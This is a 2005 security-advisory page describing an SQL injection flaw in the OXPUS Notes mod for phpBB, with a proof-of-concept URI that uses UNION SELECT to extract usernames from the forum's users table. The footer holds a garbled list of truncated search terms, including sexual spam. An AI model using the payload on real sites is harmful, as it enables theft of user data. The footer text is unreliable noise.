about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Notes Module for PHPBB SQL Injection Vulnerability


Title Notes Module for PHPBB SQL Injection Vulnerability
Published 2005-04-28-12:00AM
Updated 2005-05-10-03:03PM
Class Input Validation Error
CVE   CAN-2005-1378
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team is credited with the discovery of this vulnerability.
Vulnerable  OXPUS.de Notes mod
Not Vulnerable  OXPUS.de Notes mod 1.4.7
Code   No exploit is required.

The following proof of concept URI is available:
http://www.example.com/posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 14:46:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
maxcpm.inf www.weijig MikroTik for www.se ethel boob atomz www.tuve8. www.gm123. maxcpm.inf www. tamil www.3pzz.c Full+sex+v www.ecodee www.89sex. www.cnyidu www.pakist www.chinaa s...ticles www.tuve8. Www.Xxx ai rosi www.trish maxcpm.inf www.8ioo.c maxcpm.inf www.pakist www.liuzb. Fotos sex Invision P asian ts parallels t125t www.lexsen www.jxcsj. mallu sex www.lexsen ...t/comp Aishwarya www.pinkwo www.pinkwo www.rugao8 Shakilasex usa.sexvid Www.indin www.sex.go xingyuan.z CAN-2004-1 maxcpm.inf usa.sexvid maxcpm.inf